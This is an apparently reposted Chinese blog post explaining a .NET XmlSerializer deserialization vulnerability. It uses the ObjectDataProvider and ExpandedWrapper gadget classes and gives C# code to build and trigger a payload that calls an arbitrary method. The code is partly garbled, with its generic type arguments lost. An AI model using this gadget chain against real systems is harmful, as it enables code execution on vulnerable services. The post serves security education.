.Net反序列化漏洞之XmlSerializer-白红宇

.Net反序列化漏洞之XmlSerializer

阅读量：6220 次

发布时间：2019-06-21

本文共 1338 字，大约阅读时间需要 4 分钟。

条件：

初始化对象时，类型可控：new XmlSerializer(type可控)

反序列化对象时，输入内容可控：serializer.Deserialize(fi可控)

两个关键类：ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0System.Windows.Data.ObjectDataProvider//System.Data.Services.dll   v4.0.0.0System.Data.Services.Internal.ExpandedWrapper

Payload生成：

public static void serializeObjectWithXmlSer()        {            ExpandedWrapper
    
      eobj = new ExpandedWrapper
     
      ();            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper
      
       ));            eobj.ProjectedProperty0 = new ObjectDataProvider();            eobj.ProjectedProperty0.ObjectInstance = new Class2();            eobj.ProjectedProperty0.MethodName = "writeFile";            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");            serializer.Serialize(fo, eobj);            fo.Close();        }

触发Payload：

public static void deserializeObjectWithXmlSer()        {            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper
    
     ));            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");            ser.Deserialize(fi);            fi.Close();        }

转载于:https://blog.51cto.com/duallay/2045651

你可能感兴趣的文章

OSChina 周五乱弹 —— 为什么程序媛那么少？

查看>>

OSChina 周二乱弹 —— 我有垃圾，你有桶么

查看>>

前端那些事之工具涵数库--underscore

查看>>